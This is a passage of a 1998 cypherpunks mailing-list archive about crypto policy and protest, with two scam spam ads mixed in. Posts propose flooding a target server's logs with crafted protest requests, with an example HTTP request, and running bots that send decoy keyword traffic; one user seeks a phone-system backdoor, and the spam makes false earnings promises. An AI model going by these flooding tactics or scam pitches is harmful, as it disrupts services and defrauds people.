will get paid $900 cash!  If you stuff 1000 envelopes, you will 
be paid $3000 cash.  You just need to follow word for word my 
straight-forward instructions and you will get paid...every 
single time...Guaranteed!

     My method will even show you how to get the envelopes with 
the addresses and stamps already on them.  This means, no 
addressing of envelopes or licking of stamps is required!  Simply 
fill the envelopes with my sales materials, put them in the mail 
box and you'll get $3 for every single one...Guaranteed!  I have 
taken the measures to make things as simple and easy as possible 
for you.

                                             
                      DON'T RISK MISSING OUT!

     I am seeking a limited number of home workers, and I will 
stop accepting orders as soon as I get enough home workers in 
your area.  To avoid losing out on the chance to be one of our 
home workers, order your "$3 per Enveloped System".

     The cost of this  system is only $55.  Included is 
everything you need to start making money immediately with easy 
step by step instructions and supplies to get you started.  And 
remember, after stuffing only 21 envelopes you'll have earned 
more than your investment back.


                   45 Day Money Back Guarantee!!!

     You have a full 45 days (that is six weeks) to use the "$3 
dollar per envelope system".  If you have not realized the money 
making potential of this system within this time, simply return 
the materials and you'll receive an immediate refund...no 
questions asked!!

Sincerely, 
    

Andrew  W. Devore, President 
Better Solutions


Important note:   There are two choices  before you.  You can 
place this letter in your pile of junk mail and return to the 
same old routine.  Or you can order my system to solve all your 
money problems starting immediately!

We both know that procrastination never leads to any kind of 
success.  So, if you are serious about making money from home, 
order my system within 10 days and I'LL GIVE YOU 50% OFF.  This 
means you'll get the "$3 per envelope system" for only $27.50 
(instead of the regular $55).  To qualify for this special 
discount, you must order within 10 days.  Please fill out the 50% 
Risk-Free Order Form and mail it in now.  Don't put it off.  Just 
do it!

----------------------------------------------------------------- 
                   PRINT OUT THE FORM BELOW
-----------------------------------------------------------------
If you are signing-up within 10 days, your cost is only $27.50.  
If not, please fill out this form and enclose the regular $55.  
Welcome aboard!!    

Please mail payment to:  Better Solutions  2065 Rodney Dr.  Suite 
105 Dept.410  LA  CA  90027                       
                        
                  *50% OFF RISK-FREE ORDER FORM*


First Name________________Last Name __________________________   

Mailing
Address____________________________________________________

City______________________________State______Zip_________________

Phone (      ) _____________Email Address_________________

Where You Read About Better Solutions?____________ 

$ Amt. Enclosed?____________

(Circle One)Paying by:     Check      Money Order    Credit Card 

(WE ACCEPT Visa, Mastercard, Discover, or American Express)

Type of card 
(e.g.Visa)_________________Card#______________________________

Expiration Date________________$ Amount(Circle One)?  $55     
$27.50

I am legally authorized to make purchases using this card.  After 
the 45 day guarantee, I forfeit my right to chargeback and 
request a reversal of charges for this credit card purchase.

Signature___________________________Date_________________________


Please Note:  If you pay by money order, your order will be 
processed immediately and sent out the next day.  We wait for all 
checks to clear so there will be a 7-14 day delay on your order 
being processed. Credit cards clear faster than checks but slower 
than money orders.   If you are paying by credit card, all the 
information must be there for order to be processed!
 
 
 
 
 
 
 
 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: HyperReal-Anon <nobody@sind.hyperreal.art.pl>
Date: Wed, 16 Dec 1998 08:45:00 +0800
To: cypherpunks@cyberpass.net
Subject: HAS The Revolution Died??
Message-ID: <c62975ab329fc89517e6a338b0fc967f@anonymous>
MIME-Version: 1.0
Content-Type: text/plain



 "I CANT PARTICIPATE IN THE REVOLUTION BECAUSE I DIDNT
  GET ENOUGH NOTICE OR ITS TOO INCONVENIENT OR THEY
  ARE USING LEFTIST PROTEST TECHNIQUES"
  EXPORTING PGP WITHIN MINUTES OF ITS RELEASE
  NOW THAT WOULD IMPRESS ME...
  (BEEN THERE DONE THAT!)
   NOW I am trying to shake the apathy from all of you..
   Its so much easier to talk about revolution than
   participating or contributing...
   Talking about revolution does NOT make it happen
   magically..
  
   I suspect the revolution will die given the above
   
   anon

 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "John Kelsey" <kelsey@plnet.net>
Date: Wed, 16 Dec 1998 16:31:11 +0800
To: <james@wired.com>
Subject: Re: Anyone Striking?
Message-ID: <199812160741.BAA26791@email.plnet.net>
MIME-Version: 1.0
Content-Type: text/plain



> From: Perry E. Metzger <perry@piermont.com>
> To: James Glave <james@wired.com>
> Cc: Robert Hettinga <rah@shipwright.com>; cypherpunks@toad.com; cryptography@c2.net; dcsb@ai.mit.edu
> Subject: Re: Anyone Striking? 
> Date: Monday, December 14, 1998 10:06 AM
 
> James Glave writes:
> > Anyone participating in the strike today? I'd like to possibly visit this
> > with a news story...
> 
> I find it exceptionally unlikely that many people are participating in
> this. Whomever called the thing was not thinking very clearly. You
> need at least several weeks notice for such a thing to work, and the
> two or three days notice (at most) that was given was way too small. A
> strike of this nature might work, but only if someone with political
> sense were organizing it.

What would be the usefulness of this, anyway?  Most of us who know and care about this 
issue are already working in the field of cryptography or computer security at some
level--how will slowing our projects down by a day help our cause?  How will refusing
to design strong systems that use cryptography send a message to the government that
their meddling won't keep us from designing such systems?  

> Perry

--John Kelsey, kelsey@counterpane.com / kelsey@plnet.net
NEW PGP print =  5D91 6F57 2646 83F9 6D7F 9C87 886D 88AF




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous <nobody@replay.com>
Date: Wed, 16 Dec 1998 14:35:45 +0800
To: cypherpunks@EINSTEIN.ssz.com
Subject: RE: DoS considered harmful [WAS: RE: Anyone striking?]
Message-ID: <199812160609.HAA31572@replay.com>
MIME-Version: 1.0
Content-Type: text/plain



> -----Original Message-----
> From: Trei, Peter [mailto:ptrei@securitydynamics.com]
> Sent: Tuesday, December 15, 1998 11:23 AM
> To: cypherpunks@toad.com; cryptography@c2.net; dcsb@ai.mit.edu
> Cc: Trei, Peter
> Subject: DoS considered harmful [WAS: RE: Anyone striking?]
> 
> Someone using the name Carlos Gomes [GomesC@netsolve.net] 
> wrote:
> 
> > [...]
> > There were several ideas floating around: a) detach
> > from the net and from work b) create a signed letter of
> > disapproval published to appropriate orgs c) _short_
> > loosely organized burst of DoS against select online
> > targets from widely distributed sources.
> 
> > All valid forms of protests (when properly organized
> > and executed) all with varying forms of impact and
> > visibility.  For the record, I think option c) could be
> > a valid and effective form of active protest.  It is a
> > form which has not been used in support of the cpunks'
> > agenda (or many agenda's for that matter) to date and
> > one that merits a review.
> > [...]
> 
> > regards,
> > C.G.
> 
> A DoS (Denial of Service) action is a really, really,
> really bad idea.
> 
> It's both illegal and counterproductive. It's the sort
> of thing I would expect to hear from an 'agent
> provocateur' bent on discrediting critics of
> government policy, by casting them as malicous hackers.
> 
> We went through this once before. Back when I was
> getting the DES challenges going, some one proposed
> that the target should be a live bank transaction (I
> think in Germany). I argued strenuously against such a
> move, and in favor of a specifically created target
> This goal was fullfilled when I got RSA to set up and
> sponsor the Symmetric Key Challenges.
[deletia]

Hmm... I agree that Peter's representation of my suggestion would not be a
good idea nor would it be productive-- especially in the long run.  And his
interpretation of my writing was correct given the current understanding of
what a DoS is.  So let me flesh out a bit what I think option c) above
should have said.

In my first mail to the list on the strike subject I offered a couple
references outlining some possible forms of electronic civil disobedience
(ECD).  The analogy used in those texts is to a "sit in" or, as explained in
other references not mentioned, the activity can be looked at as a large
scale letter writing campaign like the ones organized by Amnesty
International which are aimed at prison officials holding political
dissidents or political prisoners.  The idea is to maximize awareness (to
the targets as well as mass media) of the protest while minimizing the
likelyhood of severe litigation or other punitive action against those
involved in the protest.  It's basically an indismissible show of dissent in
large numbers aimed directly at the source of the dissent.

As commonly understood, a DoS (Denial of Service) attack would entail an
undisclosed group of hackers and script kiddies attempting to knock out a
server/site for as long as possible-- which usually requires that the group
be destructive and remaining as anonymous and untrackable as possible.  This
was _not_ what I had in mind as option c).

In an effective ECD campaign you would want to publicize what your agenda is
including a listing of possible spokespersons/leaders for negotiation to
both the target and the media.  You would also want to control the extent of
the Disruption of Service (instead of Denial of Service) to somewhere
between more than barely being noticed to less than breaking any laws.

Example: A public web page is setup with information on the next "sit in" or
"log writing campaign" containing the agenda behind the protest, contact
persons for more information, target site with explanation of choice, start
time and stop time.  Let's further that the cause is able to get a couple
hundred or couple thousand supporters to, for example, repeatedly telnet to
port 80 on the remote server during a specific 5 minute window and type in:

GET I do not support your sites views on such and such see
www.stop_this_now.org for details.

Given the right level of logging on the server you'd quickly fill up the
target's logs with a record of the number of people (or actually computers)
that don't agree with the target's agenda.  In Trei's last copied paragraph
he mentioned setting up a dedicated target for the DES challenge.  I think a
similar scenario would also be an effective tool for ECD for testing support
as well as being an alternate site since some target sites could be ominious
enough to keep supporters at bay and a guinea pig site with full logging
could be used to gather data to present to the media directly instead of to
the media through a target site.

I'd rather not get into a lengthy arguement about the legality of the above
or whether it can be implemented since judging from the result of some of
the last calls to protest within this group I don't think this type of
action will see a real implementation anytime soon so it's legality and
feasibility would be mostly speculation IMHO.  I just wanted to clarify what
I had in mind as option c) in the original mailing.

It's late and there's a bunch of good jazz happening the next two nights at
the Mercury Lounge in downtown Austin.  The crypto revolution will have to
wait for a less festive time of year :-)...

waves,
C.G. 

--
the above are my views-- and possibly my views alone :-(




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Della7079@aol.com
Date: Wed, 16 Dec 1998 21:31:24 +0800
Subject: How to Win!!
Message-ID: <c1495ebb.3677a6a3@aol.com>
MIME-Version: 1.0
Content-Type: text/plain



LUCKY SLOTS!!
HOW TO BEAT THE
CASINO BANDITS



Dear Thrill Seeker,

Everybody loves to play the slots. But just about everybody LOSES when they
play the slots. This book has news for you. SLOT MACHINES CAN BE BEATEN!! You
can now "disarm" the Bandits!

Here's a book that gives you all the necessary tips, strategies and techniques
you need to boost your winnings by 100%-AND MORE. Here under one cover you are
given the hard rules for overcoming the bandits, rules that you'll be able to
employ now- IMMEDIATELY!

You will learn all you need to know about slots, so much so that you will win
and win and win!

Pick machines that yield the biggest wins make adjustments to conserve your
bankroll quit before your hot streak fades learn how casino slots are set how
odds are calculated locations of "loose" & "tight" machines locating casinos
where winning is easier.

IMAGINEI Thousands of slot machines at your disposal just waiting to be
plucked. Machines with jackpots of $50,000, $100,000, yes, even a MILLION
dollars, sitting there ready to unload their booty.

One thing is for sure. You must have some Ape of edge to win at the slot This
great book will give you that edge. So buy it, take it with you to the casinos
and . . .


THE NEXT PULL OF THE HANDLE COULD MAKE YOU A  MILLIONAIRE!!!

FEATURING 
 1. SLOTS SLANG
 2. TYPES OF SLOTS
 3. HOW TO PLAY SLOTS
 4. VIGORISH
 5. SLOTS AND PERCENTAGES
 6. MONEY MANAGEMENT
 7. SLOT MATHEMATICS
 8. MACHINE CYCLES
 9. THE SLOT FLOOR
10. MECHANICAL PROBLEMS
11. RESERVING THE  MACHINE
12. SYSTEMS
13. ALL ABOUT JACKPOTS
14. CHOOSING YOUR SLOT
15. PULLING THE HANDLE
16. AMATEURS AND EXPERTS
17. AND MUCH, MUCH MORE!


ACT NOW!  30 DAY MONEY-BACK GUARANTEE


"For over 20 years I've played the slots as a lark. After reading your book I
play for one reason- TO WIN! And that's just what I'm doing. Who said the
bandits can't be beaten!!"

J. Bresnahan
San Diego, CA


IT'S  EASY TO ORDER!  Simply Print Out This Form, Fill Out & Mail Today. 


YES!  I want To Beat the One Arm Bandit please RUSH!


Enclosed is my: Check _____  Cash ____ Money Order ____  for $10.00

(Outside of U.S.A. add $5.00 for shipping & handling)


Name: _________________________________

Address: _______________________________                                      

City _____________    State_______   Zip_________


E-mail Address: _____________________________


Phone # _________________


MAIL TODAY:

GLOBAL DISTRIBUTION		
 P.O BOX 7247
 GARDEN CITY, NY 11795   U.S.A.









From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Wed, 16 Dec 1998 22:01:04 +0800
To: cypherpunks@EINSTEIN.ssz.com
Subject: Skipjack KEA Errata
Message-ID: <199812161333.IAA31332@camel8.mindspring.com>
MIME-Version: 1.0
Content-Type: text/plain



Thanks to Lewis McCarthy some 20 transcription errors have been
corrected in the Skipjack Key Exchange Algorithm test vectors,
a summary of which is offered at:

   http://jya.com/kea-errata.htm

Original transcriptions of the Skipjack spec have been updated:

Matt Curtin's:

   http://www.interhack.net/pubs/skipjack-kea.tgz (Archive of it all)
   http://www.interhack.net/pubs/skipjack-kea.ps (Postscript)
   http://www.interhack.net/pubs/skipjack-kea.tex (LaTeX source)

JYA's:

   http://jya.com/skipjack-spec.htm
   http://jya.com/skipjack-spec.zip (same, zipped)








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Frederick Burroughs <riburr@shentel.net>
Date: Wed, 16 Dec 1998 22:05:49 +0800
To: Cypherpunks <cypherpunks@ns.minder.net>
Subject: Re: NSA Electronic Sheriff
In-Reply-To: <199812160043.TAA18739@dewdrop2.mindspring.com>
Message-ID: <3677B42A.1CF7FF8D@shentel.net>
MIME-Version: 1.0
Content-Type: text/plain





John Young wrote:

> >From a new report:
>
> "Cybercrime, Cyberterrrorism, Cyberwarfare"
>
> Tomorrow's frontline commanders will be drawn from
> the ranks of computer wizards. The sandal culture is
> challenging the wingtips. The National Security Agency's
> (NSA) new electronic sheriff, responsible for protecting
> NSA's ground stations, is a 23-year-old GS-14.

Dialog at a recent poker game at a table in the back of the NSA Saloon:

"Rumor has it there's some bad hombres ridin' into town. We're gonna
need a sheriff. Quick, pin a star on that kid over there, yeah him, the
idiot wearin' sandals. He'll stand 'em off in the street, we'll be
waitin' on the roofs."

"Hey sweetcheeks, another round for the boys."




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Sunder <sunder@brainlink.com>
Date: Wed, 16 Dec 1998 22:55:02 +0800
To: Jay Holovacs <holovacs@idt.net>
Subject: Re: Throwing Sand into the All-Seeing Eye (further ideas)
In-Reply-To: <259a896938e4522ccd3d711a4d41f7c9@anonymous>
Message-ID: <3677BC26.20F121D5@brainlink.com>
MIME-Version: 1.0
Content-Type: text/plain



Jay Holovacs wrote:
> 
> At 08:25 AM 12/15/98 -0600, mib wrote:
> >
> >On Tue, Dec 15, 1998 at 04:02:00AM -0800, Mixmaster wrote:
> >> There used to be a web site called "Throwing Sand into the All-Seeing Eye"
> >> which listed a long list of possible NSA-snooper keywords, such as
> military
> >> classifications and code words that could be sent for fun across the
> >> Internet for sole purpose of being flagged by the NSA.
> >
> 
> Here are some more suggestions (I didn't make this list; all of these
> supposedly were on watch actual lists of different types----"thanks" to the
> police & spook organizations for doing the research)
 

One of the things to consider in order to be successful in this at any level is
that we need to automate some of the features of including such keywords in
emails.  I'm sure the NSA has lovely filtering capabilities in Echelon to
remove the chaff emails.  (Think of the way spam gets filtered based on
keywords.)

Certainly if we use the same tag in every email, they can filter us out by the
email address.  This does have a nice unexpected side effect: being labeled a
kook makes for the NSA not wanting to watch your posts, and then you would have
a bit more privacy, however, don't count on this: far more likely is that they
do archive everything and then use a smart search engine.

We could rotate the tags around, but if we send too many of these, they can
throw you into the above category.

You could post them anonymously, which makes it much harder for them catalog,
so they will be forced to look at the traffic, when and if, they need to search
it.

You could have some program randomly alter your email address, but patterns
would be found to filter you out that way.

We could also use remailers to create lots of cover traffic going to
/dev/null.  This would be far more interesting, especially if we add some sort
of poetry writer that spits out spook talk and update it occasionally with
current event keywords.  Then again, they could filter the messages that go to
/dev/null, or find patterns in the spook poetry generators...  

We are of course talking about doing something as evil as spamming in that it
does generate lots of traffic and eats up lots of bandwidth.  This has the side
effect of wasting lots of our resources and little of the NSA's.  There is the
obvious problem of how many people are willing to do such a thing.  If say, ten
or twenty of us start running such spookbots, it will eat lots of our
resources, but few of theirs.  If lots and lots of us run spookbots, it might
create a small dent in Echelon which they'll simply address by adding more
hardware.  (Keep in mind that the figure of their yearly budget is several
billion, for which you pay for in the form of taxes.  Comparatively to one
person, they have what approaches infinitely greater funds.  Comparatively to
the entire country, they don't, but the entire country won't join such an
effort.)

Unless there is a large scale effort, we'd be doing nothing more than the
WASSENAAR protest.  Sure, some would say, we'd be calling undue attention to
ourselves, but if you're on this list, or receiving it, you're already calling
undue attention to yourself.  If Echelon is indeed as large as it is reported
to be, the mere reading of Cypherpunks is enough to flag you.

Anyway, anyone have any ideas to further build on this?



-- 
----------------------------  Kaos Keraunos Kybernetos  -------------------
 + ^ +        Sunder          "The   real aim  of current policy is to /|\
  \|/    sunder@sunder.net    ensure the continued effectiveness of   /\|/\
<--*--> ALLOW FREE EXPORT OF  US information warfare assets against   \/|\/
  /|\   STRONG CRYPTOGRAPHY!  individuals,businesses and governments   \|/
 + v +  PROTEST WASSENAAR!!!  in Europe and elsewhere"  -- Ross Anderson
------------------------------ http://www.sunder.net ----------------------

RESTRICTED DATA - This material contains RESTRICTED DATA as defined in
the Atomic Energy Act of 1954. Unauthorized disclosure subject to 
administrative and criminal sanctions.  NOFORN ORCON WNINTEL SIOP-ESI CNWDI




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Sunder <sunder@brainlink.com>
Date: Wed, 16 Dec 1998 22:43:20 +0800
To: Jim Choate <ravage@EINSTEIN.ssz.com>
Subject: Re: DARPA's Active Network page (fwd)
In-Reply-To: <199812160006.SAA09381@einstein.ssz.com>
Message-ID: <3677BD28.6465E8F0@brainlink.com>
MIME-Version: 1.0
Content-Type: text/plain



Jim Choate wrote:
> 
> Forwarded message:
> 
> > Date: Tue, 15 Dec 1998 17:50:56 -0500
> > From: Robert Hettinga <rah@shipwright.com>
> > Subject: DARPA's Active Network page
> 
> > I saw an article on this in InfoWorld. NAI/TIS and DARPA talking about
> > putting self-switching packets into the network. I don't see this as too
> > far off from packets purchasing their passage across the network with
> > micromoney of some kind.
> 
> How does the packet know what is a good price or a bad price as it makes
> each hop? Whose processor is it using to run its program to evaluate the
> costs? Who pays for that processor cost on a node that isn't selected? Who
> has access to the audit trail? How does a reliable copy get back to the
> originator? How does it do this in an anonymous network?

Joy, just what we needed, a twist on the old source-routing packets.  A bad
idea within a bad idea. :(  Gee, how many of your routers allow source routed
packets these days?

To add to the above question, how big will the over head of the packets be?
How will the routers know that the packets aren't forged and that they contain
real micromoney and not already spent micromoney (possibly for the purposes of
denial of service attacks or other hacking attempts)?  
How will they do this in real time and not incur huge propagation delays?


IMHO, This has the words "Stupid Idea" written all over it.


-- 
----------------------------  Kaos Keraunos Kybernetos  -------------------
 + ^ +        Sunder          "The   real aim  of current policy is to /|\
  \|/    sunder@sunder.net    ensure the continued effectiveness of   /\|/\
<--*--> ALLOW FREE EXPORT OF  US information warfare assets against   \/|\/
  /|\   STRONG CRYPTOGRAPHY!  individuals,businesses and governments   \|/
 + v +  PROTEST WASSENAAR!!!  in Europe and elsewhere"  -- Ross Anderson
------------------------------ http://www.sunder.net ----------------------

RESTRICTED DATA - This material contains RESTRICTED DATA as defined in
the Atomic Energy Act of 1954. Unauthorized disclosure subject to 
administrative and criminal sanctions.  NOFORN ORCON WNINTEL SIOP-ESI CNWDI




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mok-Kong Shen <mok-kong.shen@stud.uni-muenchen.de>
Date: Wed, 16 Dec 1998 16:33:49 +0800
To: Ben Laurie <ben@algroup.co.uk>
Subject: Re: WEAK3-EX -- A Layman's 56-bit Data Encryption Algorithm
In-Reply-To: <3676B5B3.E37D80C@stud.uni-muenchen.de>
Message-ID: <367769EF.251F7294@stud.uni-muenchen.de>
MIME-Version: 1.0
Content-Type: text/plain



Ben Laurie wrote:
> 
> Mok-Kong Shen wrote:
> > P.S. For space and obvious reasons, I plan to remove the code and
> > binaries of WEAK1, WEAK2, WEAK3 and WEAK3-E from my Web page this
> > Friday, leaving in future WEAK3-EX the single encryption software
> > accessible.
> 
> Hmm. The "obvious reasons" being one or more of the following:
> 
> a) You think people shouldn't be allowed strong crypto
> b) You think the US shouldn't have to go to the trouble of getting laws
> changed, we should just obey their whims voluntarily
> c) You are on the NSA's payroll

I didn't want to incur two matters (hence my way of formulation):

1. The law would sometime be effective in my country without my
   immediately noticing it and I'll get trobles.

2. I am not sure that my stuff is really strong. Saying that I
   have to delete because it is strong is claiming something
   at least very subjectively and anyway not scientific.

Do you understand now?

M. K. Shen




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: pgut001@cs.auckland.ac.nz (Peter Gutmann)
Date: Wed, 16 Dec 1998 05:58:51 +0800
To: cypherpunks@cyberpass.net
Subject: NZ government to legalise black bag jobs
Message-ID: <91375565311002@cs26.cs.auckland.ac.nz>
MIME-Version: 1.0
Content-Type: text/plain



15 December 1998
GOVERNMENT TO INTRODUCE AMENDMENT TO NZSIS LEGISLATION
 
The Government will introduce an amendment to legislation this week covering 
the operations of the New Zealand Security Intelligence Service, and will also 
seek to appeal part of the Choudry decision of the Court of Appeal, Prime 
Minister Jenny Shipley said today.
 
"In Mr Choudry's case, the Court of Appeal pointed out the need for Parliament 
to provide express authority for the NZSIS to enter private premises, without 
permission, to intercept communications."
 
"It is vital that the NZSIS is able to carry out its functions properly in 
gathering intelligence on security threats to New Zealand. In some rare 
instances, this may require covert entry to private property, which the 
amendment to the legislation will allow.  The existing law had been presumed 
to allow this to occur.  The Court has said if this is the intention, it 
should be made explicit as is the case in Canada, the United Kingdom and 
Australia."
 
[...]
 
Mrs Shipley said the Government would also seek leave to appeal against one 
aspect of the Court of Appeal's decision in Mr Choudry's case.  The issue 
concerns the procedure the Court should follow when the Government asserts it 
is necessary, in the course of litigation against the Crown, to withhold from 
the Court, and other parties, access to information, in order to protect 
national security interests.
 
Commentary:
 
Choudry was a protestor against the 1994 APEC meeting held in Auckland (a 
bunch of foreign politicians turned up to talk for a week, shutting down the 
city centre in a way that wasn't equalled until Mercury Energy earlier this 
year).  At the time the SIS's mandate had been widened to include "economic 
security", bringing the APEC meeting into its sphere of interest.  As part of 
the APEC brouhaha, they carried out a black bag job on Choudry and got caught, 
causing the government some embarassment.  The current bill, rushed through 
under urgency just before parliament shuts down (which means it gets 
rubberstamped with no scrutiny or debate), would legalise these things in the 
future, just in time for the next big politicians powwow next year (which has 
already lead to the army invading the university as part of some training 
exercise which involved a simulated search for dissidents).
 
The second part is more worrying, what it'll do is remove any provision for 
judicial review of dubious actions by the government by allowing them to claim 
national security concerns as a blanket excuse for whatever they do.  
Certainly in the Choudry case the real concern was job security, not national 
security.
 
Peter.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Leif Ericksen <phantom@wwa.com>
Date: Thu, 17 Dec 1998 01:29:26 +0800
To: cypherpunks@toad.com
Subject: Norstar Question
Message-ID: <3677DA8D.878B2E90@wwa.com>
MIME-Version: 1.0
Content-Type: text/plain



This may be slightly off the topic here sorry...   :(


Ok for those of you that are actually reading this message I have a
question about a  Small Office Norstart Switch/voice mail system.


I have recently taken the task of doing phone admin wehre I work and we
use a Norstar system.  I am waiting on tech support/help folk to get
back to me and wanted to see if I can get the system working before they
call.

Here is the problem.

	I do Feature 983 to get to the admin section and I type in the password
for some reason the password is not working.  I tried a fewother
combinations to see if it was given some other password, as well I
checked the defaults and I have had NO luck getting into the admin
section.  Thus my question....

	Is there a back door way ito the system that anybody on the net knows
of?


If so plese send it to me.   If it means actually having access to the
device I belive it is in a closet that I can get to with the aid of some
other folk here that have the key.



			Thank you,


			Leif Ericksen.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Tim May <tcmay@got.net>
Date: Thu, 17 Dec 1998 03:17:28 +0800
To: cypherpunks@cyberpass.net
Subject: Nitwits
In-Reply-To: <19981216164043.5754.rocketmail@send103.yahoomail.com>
Message-ID: <v03130316b29daafad1bb@[209.66.101.206]>
MIME-Version: 1.0
Content-Type: text/plain



At 8:40 AM -0800 12/16/98, Joel O'Connor wrote:

>It only took one to turn India around.  Ghandi nearly starved to
>death, used nothing but passifism and won the race man.  You can't
>discredit the labors of a few, wonderous things can happen when 3
>people bond together for a common cause.  To much negativity in this
>world already, I don't wish to add to it.  We've got nothing left but
>hope and what a large flame a small spark can ignite.


Mailing lists and news groups are filling up with nitwits like this character.

Nitwits who can't compose coherent thoughts, nitwits who can't even put
sentences together without major grammar and spelling erros, and nitwits
who have nothing to say.

Some are from Yahoo, some from MyDejaNews (tm), some from HotMail. And then
there are the unilluminati from WebTV and AOL.

A lot of people need to be taken out and shot. Or at least globally killfiled.

--Tim May

Y2K -- LMGALMAO -- Loading my guns and laughing my ass off
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
ComSec 3DES:   831-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Licensed Ontologist         | black markets, collapse of governments.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Gillogly <jim@acm.org>
Date: Thu, 17 Dec 1998 03:34:17 +0800
To: cypherpunks@cyberpass.net
Subject: Network Associates' KRA Partner status
Message-ID: <3677FD28.F7BAB298@acm.org>
MIME-Version: 1.0
Content-Type: text/plain



Bruce Schneier said in the "News" section of Crypto-Gram:
>> Okay, I finally got the story right about Network Associates Inc. and the
>> Key Recovery Alliance.  (Last month I pointed to a Wired News story that
>> they quietly rejoined.)  The story is wrong.  They never left the KRA.
>> Since its inception, Trusted Information Systems was a big mover and shaker
>> in the KRA.  When NAI bought TIS in May 1998, TIS's membership transferred
>> to NAI.  NAI resigned the leadership posts that TIS had held in the
>> Alliance and stopped attending its meetings, but never left the KRA.  So,
>> NAI is a member of the KRA, and has been since it bought TIS.
>> http://www.wired.com/news/print_version/technology/story/16219.html

Someone responded:
> When NAI bought PGP, in late 1997, Phil Zimmermann found out about NAI's
> membership, and he was able to persuade management to withdraw from
> the KRA.  This is why it is wrong to say that NAI never left the KRA.
> See http://www.news.com/News/Item/0,4,17112,00.html.

I remember hearing this at the time.  The cited article (8 Dec 1997) has
supporting quotes from NAI's Gene Hodges.  In addition, Dave Del Torto
wrote to the secretary of KRA last month and got a response from
secretariat staffer Michael LoBue on 20 Nov 1998 that addresses this
point in passing:

    Indeed, some of this current 'public debate' about NAI's
    relationship with the KRA goes back to their public statement
    that they 'withdrew' from the organization. The fact of the matter
    is that they simply did not choose to become an actual member at the
    time the organization was formally constituted. When it was reported
    that they withdrew, there was in fact no entity from which to withdraw.

While the actual status of KRA is interesting, the relevant point is
that NAI did indeed say they were withdrawing, and they did withdraw
from participation in the nascent organization.

> NAI bought TIS a few months later.  TIS was a member and in fact a leading
> member of the KRA.  By purchasing TIS, NAI inherited its membership in
> the KRA, and so NAI was once again a member.

It was more explicit than this.  Michael LoBue said further:

    Concerning Network Associates membership in the KRA, in response to your
    question I have verified that our files contain an executed Membership
    Agreement for Network Associates (dated July 2, 1998), as well as a properly
    completed Application for Membership of that same date. 

This is not just accepting the existing membership status of TIS.  It's
reversing NAI's non-membership status and explicitly joining.

DDT's message and KRA's response were posted to several lists on 22 Nov 1998.

Somebody'd better write this all in a physical book before the wrong version
gets scribbled into history.  Webbage is nice, but is regrettably transient.
-- 
	Jim Gillogly
	26 Foreyule S.R. 1998, 18:06
	12.19.5.13.19, 5 Cauac 12 Mac, Ninth Lord of Night




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: mib <mib@io.com>
Date: Thu, 17 Dec 1998 01:29:20 +0800
To: "Joel O'Connor" <ogrenivek@yahoo.com>
Subject: Re: I must admit. . .
In-Reply-To: <19981216144244.7920.rocketmail@send101.yahoomail.com>
Message-ID: <19981216103440.A17503@io.com>
MIME-Version: 1.0
Content-Type: text/plain



On Wed, Dec 16, 1998 at 02:42:44PM +0000, Joel O'Connor wrote:
> Cypherpunks write code?  Make people use it. . .

Vee have vays...

- d.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous <nobody@replay.com>
Date: Wed, 16 Dec 1998 18:41:49 +0800
To: cypherpunks@cyberpass.net
Subject: RE: DoS considered harmful [WAS: RE: Anyone striking?]
Message-ID: <199812160955.KAA15452@replay.com>
MIME-Version: 1.0
Content-Type: text/plain



At 07:09 AM 12/16/98 +0100, Anonymous wrote:

>> > disapproval published to appropriate orgs c) _short_
>> > loosely organized burst of DoS against select online
>> > targets from widely distributed sources.

>> A DoS (Denial of Service) action is a really, really,
>> really bad idea.

["clarification", or something, elided]

>Example: A public web page is setup with information on the next "sit in" or
>"log writing campaign" containing the agenda behind the protest, contact
>persons for more information, target site with explanation of choice, start
>time and stop time.  Let's further that the cause is able to get a couple
>hundred or couple thousand supporters to, for example, repeatedly telnet to
>port 80 on the remote server during a specific 5 minute window and type in:
>
>GET I do not support your sites views on such and such see
>www.stop_this_now.org for details.
>
>Given the right level of logging on the server you'd quickly fill up the
>target's logs with a record of the number of people (or actually computers)
>that don't agree with the target's agenda.  [...]

You clearly don't run a website. Logs are very valuable. Any admin
who doesn't have space for at least several days of normal traffic
available on their logging device is simply not doing a good job.
A network admin running a website doesn't lose logs - careers live
and die on them (if this seems an overstatement to you, go look at
http://www.abcinteractiveaudits.com/ and report your findings.
-10 points for declaring it stupid.).

If you didn't mean "fill up the target's logs" (which I took to mean
overflow available disk space), but rather "pepper the logs with
many instances of some sort of odd political commentary", that could
have an effect. It could throw off reporting and make a new conversation
topic for editors, which might, if you managed to organize enough
people, earn you a CNET story. "CyberActivists Make An Obtuse
Statement - Click Here For Soundbyte".

Great job.

Truth is, on any major site, you'd need hundreds of robots making
your bogus requests to show up - manually telneting to port 80
is line noise these days to any serious site, unless you're poking
at potential security problems.

If you really want to try this, at least take the bother to make
valid HTTP requests that most servers will recognize. Your example
above should be something like:

GET
/I/dont/support/your/sites/views/on/such/and/such/see/www.stop.this.now.org/
for/details HTTP/1.0

(note the two newlines at the end of the request)

A sysadmins reality check,

T. Pynchon 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Hettinga <rah@shipwright.com>
Date: Thu, 17 Dec 1998 03:22:00 +0800
To: <cypherpunks@Algebra.COM>
Subject: Re: DigiCash Update, part II
